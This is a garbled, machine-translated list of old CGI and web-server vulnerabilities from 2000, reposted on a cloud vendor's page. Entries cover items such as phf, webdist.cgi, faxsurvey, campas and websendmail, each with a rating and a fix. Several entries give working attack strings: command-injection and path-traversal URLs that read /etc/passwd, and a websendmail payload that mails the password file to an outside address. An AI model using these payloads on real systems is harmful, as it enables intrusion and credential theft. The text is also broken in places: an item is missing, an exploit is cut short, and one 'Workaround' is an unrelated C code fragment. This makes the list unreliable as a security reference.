#############################################################################
This article is taken from a friend. This is not a precious thing, if you usually pay attention to collect words, I believe many people will
There is more comprehensive and better information than this. But for some reason, this information has been refused to be made public. But I'm a cult-end
Full free, fully open, fully shared little guys. So I made the information public. I hope that friend don't blame:)
# If any security organization or individual is willing to have no taste of this article for long-term, uninterrupted maintenance, updates or changes. Please do your own
Don't bother to discuss it with me. But the requirement is that results must be completely public to the Internet. The possession of any act is not to be merry.
Welcome to.
# This article welcomes the transfer. But please keep these statements.
# If you have any questions or suggestions, please mailto:iwillsurewin@163.net
# Iwillsurewin 2000.7.28
############################################################################
1
Type: Attack type
Name: PHF
Risk Rating: Medium
Description: In NCSA or Apache (1.1.1 version), a non-commercial version of the Web server has a program util.c that allows hackers to execute any command as root:
Http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
Suggestions:
Workaround: Upgrade the Apache Web server to 1.1.1 or upgrade the NCSA Web server to the latest version
2
Type: Attack type
Name: Wguset.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, and Wguest.exe exists in your Web executable directory, intruders will be able to use it to read files that all usr_Recommendation: Remove or remove Wguset.exe from your web directory
Workaround: Remove or remove Wguset.exe from your web directory
3
Type: Attack type
Name: Rguset.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, and Rguest.exe exists in your Web executable directory, intruders will be able to use it to read files that all usr_Recommendation: Remove or remove Rguset.exe from your web directory
Workaround: Remove or remove Rguset.exe from your web directory
4
Type: Attack type
Name: Perl.exe
Risk Rating: Low
Description: There is a perl.exe in the Cgi-bin execution directory, which is a serious configuration error. Hackers can add a bunch of instructions behind the Perl.exe and use the browser to execute any script on the server
Recommendation: Perl.exe is not safe in any Web directory with Execute permissions
Workaround: Remove the Perl.exe this program under the Web directory.
5
Type: Attack type
Name: Shtml.exe
Risk Rating: Low
Description: If you use front page as your webserver, then intruders can use iusr_<lt;hostname> users and shtml.exe to invade your machine and do what you don't want
Recommendation: Remove or remove Shtml.exe from your web directory
Workaround: Remove or remove Shtml.exe from your web directory
7
Type: Attack type
Name: Uploader.exe
Risk Rating: Medium
Description: If you use NT as your webserver operating system, intruders can upload any file using Uploader.exe
Recommendation: Remove or remove Uploader.exe from your web directory
Workaround: Remove or remove Uploader.exe from your web directory
8
Type: Attack type
Name: BDIR.HTR
Risk Rating: High
Description: If you use NT as your webserver operating system, and BDIR.HTR exists in your Web executable directory, intruders will be able to use it to create an ODBC database indefinitely on your server and generate some executable files.
Recommendation: Remove or remove BDIR.HTR from your web directory
Workaround: Remove or remove BDIR.HTR from your web directory
9
Type: Attack type
Name: count.cgi
Risk Rating: High
Description: The COUNT.CGI program (wwwcount2.3 version) in the/cgi-bin directory has an overflow error that allows intruders to execute any instructions remotely without logging on.
Recommendation: You can delete the file if it is not necessary
Workaround: Upgrade the Wwwcount to 2.4 or more
10
Type: Attack type
Name: test-cgi
Risk Rating: High
Description: test-cgi This file can be used by intruders to browse important information on the server
Recommendation: Recommend audit Cgi-bin Directory of the implementation procedures, strict control of access rights
Workaround: Delete the test-cgi file
11
Type: Attack type
Name: nph-test-cgi
Risk Rating: High
Description: nph-test-cgi This file can be used by intruders to browse important information on the server
Recommendation: Recommend audit Cgi-bin Directory of the implementation procedures, strict control of access rights
Workaround: Delete the nph-test-cgi file
12
Type: Attack type
Name: php.cgi
Risk Rating: Low
Description: php.cgi programs have more vulnerabilities, including cache overflow vulnerabilities, and vulnerabilities that cause any system files to be read by intruders
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Removing the PHP.CGI program is the best way
13
Type: Attack type
Name: Handler
Risk Rating: Low
Description: IRIX 5.3, 6.2, 6.3, 6.4 The/cgi-bin/handler program has a cache overflow error that allows an intruder to execute a program remotely on the server:
Telnet target.machine.com 80
Get/cgi-bin/handler/whatever;cat/etc/passwd|? data=download
http/1.0
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
WORKAROUND: Delete the handler file
14
Type: Attack type
Name: Webgais
Risk Rating: High
Description:/cgi-bin, the Webgais in the directory is an interface to the Gais search tool, which has a problem that allows intruders to bypass the security mechanism of the program and execute system commands:
Post/cgi-bin/webgais http/1.0
CONTENT-LENGTH:85 (replace this and the actual length of the "Exploit" line)
Telnet target.machine.com 80
15
Type: Attack type
Name: Websendmail
Risk Rating: High
Description: The Websendmail program in the/cgin-bin directory allows intruders to execute a system directive:
Telnet target.machine.com 80
Post/cgi-bin/websendmail http/1.0
Content-length:xxx (should is replaced with the actual length of the string passed to the "server, in this case xxx=90)
Receiver=;mail+your_address\ @somewhere. Org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Advanced User: Edit Websendmail script, filter special characters
General User: Delete websendmail file
16
Type: Attack type
Name: webdist.cgi
Risk Rating: High
Description: For Irix6.2 and 6.3 platforms, the webdist.cgi in the/cgi-bin directory has a weakness that allows intruders to execute any instructions on the system without having to log on:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the webdist.cgi in the/var/www/cgi-bin/webdist.cgi directory
17
Type: Attack type
Name: Faxsurvey
Risk Rating: High
Description: The Faxsurvey program on the Linux S.U.S.E/cgi-bin directory allows intruders to execute instructions on the server without having to log on:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the/cgi-bin/faxsurvey file
18
Type: Attack type
Name: Htmlscript
Risk Rating: Medium
Description: A htmlscript2.99x or earlier server is installed, and there is a problem that allows intruders to view any file on the server:
Http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the/cgi-bin/htmlscript script file, or upgrade the Htmlscript to 3. More than 0
19
Type: Attack type
Name: Pfdisplay
Risk Rating: Medium
Description: On Irix6.4 or earlier Web servers,/cgi-bin/pfdisplay programs allow intruders to illegally view files on the server
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete/cgi-bin/pfdisplay files, or patch
Patches can be downloaded to sgigate.sgi.com (204.94.209.1) or ftp.sgi.com:
filename:readme.patch.3018
Algorithm #1 (sum-r): 37955 readme.patch.3018
Algorithm #2 (sum): 15455 readme.patch.3018
MD5 checksum:1169eb51d75e0794c64c2c1fd6211b69
20
Type: Attack type
Name: Www-sql
Risk Rating: Medium
Description: Www-sql exists in the/cgi-bin/directory, which will cause intrusion to be unauthorized access to protected files
Recommendation: It is best to delete www-sql files
Workaround: #if phpfastcgi
while (fcgi_accept () >= 0)
{
#endif
s = getenv ("Redirect_status");
if (!s) {
Puts ("Content-type:text/plain\r\n\r\nphp/fi detected an internal error. Please inform sa@hogia.net of what for you just did.\n ");
Exit (1);
}
s = getenv ("path_translated");
Related connections:
21st
Type: Attack type
Name: View-source
Risk Rating: High
Description: The View-source program in the Cgi-bin directory does not have security checks on the input, allowing intruders to view any files on the server
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Viewsource program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
22
Type: Attack type
Name: Campas
Risk Rating: High
Description: The Campas program in the Cgi-bin directory has a problem that allows intruders to view important files on the server at random:
Telnet Www.xxxx.net 80
Trying 200.xx.xx.xx ...
Connected to Venus.xxxx.net
Escape character is ' ^] '.
get/cgi-bin/campas?%0 acat%0a/etc/passwd%0a
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Campas program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
23
Type: Attack type
Name: Aglimpse
Risk Rating: High
Description: The Aglimpse program in the Cgi-bin directory has a problem that allows intruders to execute arbitrary instructions without having to log on
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the Aglimpse program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
24
Type: Attack type
Name: at-admin.cgi
Risk Rating: Medium
Description: The/CGI-BIN/AT-ADMIN.CGI program on excite for WEB Servers 1.1 allows ordinary users to fully control the entire system
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
Workaround: Delete the at-admin.cgi program in the/cgi-bin directory
Related connection: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64
25
Type: Attack type
Name: Finger
Risk Rating: Medium
Description: This finger program, located under/cgi-bin, can view information about other servers, but if you change the parameters to a machine, the account information on this machine will be exposed:
/cgi-bin/finger? @localhost
Recommendation: Recommend the audit Cgi-bin directory, avoid unnecessary procedures exist
WORKAROUND: Delete the finger program in the/cgi-bin directory
Related connections:
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.
